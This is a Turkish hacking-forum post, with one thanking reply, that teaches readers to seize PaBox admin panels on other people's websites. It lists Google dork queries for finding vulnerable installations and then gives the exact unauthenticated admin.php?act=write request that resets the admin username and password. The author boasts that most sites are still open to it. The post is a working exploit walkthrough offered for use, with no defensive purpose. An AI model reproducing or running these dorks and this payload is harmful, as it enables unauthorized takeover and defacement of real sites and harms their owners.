PaBox Admin Panel Vulnerable

Dark_Crazy

New member
Katılım
3 Kas 2005
Mesajlar
425
Reaction score
0
Puanları
0
Yaş
34
Konum
Ölümün Ötesindeki Köy...
Sizlere PaBox Panel’de Admin olmaktan bahsedeceğim.Bu Açığı Kapatan Siteler %30 u geçmez yani %70 i bizim demektir.Ben şahsen denedim:).



İlk önce En büyük yardımcımız olan Google dan başlayalım.Burda dikkat etmeniz gereken bir husus bu scriptin ana sayfasının index.php yerine thebox.php olması... ve çoğunlukla da thebox klasöründe bulunmaktadır.



inurl:thebox/thebox.php

inurl:thebox/admin.php

intitle:paBox Admin Panel

...



Sadece bu verdiklerim ile yetinmeyin kendiniz de bir şeyler yapın mesela sonlarına site:il... şeklinde ekleyip ülkesini, belirtebilirsiniz...



Sitemizi bulduk http://www.example.com/thebox/thebox.php Burada görmüş olduğunuz

/thebox.php yerine

/admin.php?act=write&username=Z@M@N&password=Hacker&aduser=Z@M@N&adpass=Hacker

yazıyoruz daha sonra 2 defa yönlendirme(Yönlendirmede beklememek için linklere tıklayın ) çıkacak ve bizi admin paneline yönlendircek.

Kullanıcı Adı: Z@M@N

Şifre: Hacker

---------------------------------
Thanks for loggin in, Z@M@N!

Now taking you to your admin panel...

---------------------------------

yazısını görünce bilinki artık admin paneliyiz.

Admin Panel AnaSayfası (admin.php?act=main)

Aşağıdaki resimde de görmüş olduğunuz gibi Site Name yazan yere sitenin başlığını yazacaksınız.Onun altı ise Background Color: Arka Plan rengini belirler.


main18vp.gif


Edit Language Attributes (admin.php?act=lang)


KONUYU OKUYUP DA TEŞEKKÜR ETMEYENİ :mad: :mad: :mad:
DÜŞÜNCEM TEŞEKKÜR TOPLAMAK DEİL SADECE FORUMDA NE KADAR SÖMÜRÜCÜ KİŞİ VAR ONU KONTROL ETMEKTİR.
ZATEN BU DÖKÜMANI OKUYAN ÇOGU KİŞİ BU DÖKÜMANI BAŞKA BİR FORUMA C/P YAPMIŞTIR BİLE :mad: :mad:
 
güzel paylaşım. paylaşımın için teşekkürler
 
Geri
Üst